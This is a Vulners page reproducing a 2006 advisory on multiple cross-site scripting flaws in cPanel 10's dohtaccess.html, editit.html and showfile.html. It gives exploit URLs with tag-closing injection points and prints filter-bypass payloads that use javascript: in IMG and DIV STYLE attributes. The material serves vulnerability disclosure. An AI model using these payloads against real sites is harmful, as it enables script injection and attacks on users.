Vulners
Lucene search
cpanel10xss.txt
`#####################################################
##
## << Multiple cross site script >>
##
## C P A N E L 1 0
##
## Preth00nker [at] gmail [dot] com
## BY PRETH00NKER
## http://mexhackteam.org
##
## special dedication for my friends of:
## <<http://www.elhacker.net>>
##
##
######################################################
[ introduction ]
Preth00nker was discovering some news vulnerabilities in cpanel 10.
Cite: cPanel allows domain owners to manage and monitor their web site.
This easy to use interface is packed full of useful features. Inside
cPanel, domain owners can control their web site to a degree which was
never before possible. cPanel gives domain owners a flexibility beyond
that of the competition.
Refer:http://www.cpanel.net/products/cPanelandWHM/linux/cpanelov.htm
[ Explanations: ]
Exploit #1: http://[Target:port]/frontend/x/htaccess/dohtaccess.html?dir=>[Your Code here]
Condition's labels: just a ! > ! next the script.
In first case we can see that an error happen in the $dir variable
inside 'dohtaccess.html' file; When the applications can't find the
folder that you request the script
print next code in the checkbox
//------------ Start -------------------
<input type="checkbox" name="protected" Internal Error, can't find that folder [/home/user/public_html/isn0taf0lder]
\\------------- EOF --------------------
We can see that, if we close the label then now can start the insertion
of an arbitrary code here.
Exploit #2: http://[Target:port]/frontend/x/files/editit.html?dir=/&file=">[Your Code here]
Condition's labels: just a ! "> ! next the script.
every time the script is printing something like this
//------------ Start -------------------
Save file as: <input type="text" value="FILE HERE" name="file">
\\------------- EOF --------------------
in this case, too we can see that the $file variable inside
'editit.html' file is not filtrated of a secure way, just is
necessary that close the textarea for that an attacker can insert
a script into the page.
Exploit #3: http://[Target:port]/frontend/x/files/showfile.html?dir=/&file=[Your Code here]
Condition's labels: without ! <script> ! labels
in this ultimate case we can see that one more times the
'showfile.html' has an error at the moment of filtrate the
labels, because just do it with < script >'s labels, an attacker
can take advantage of this situation and inject some code like
//------------ Start -------------------
<IMG SRC="javascript:alert()" />
<DIV STYLE="background-image: url(javascript:alert('¡B00M!'))" >
or some thing like this...
\\------------- EOF --------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4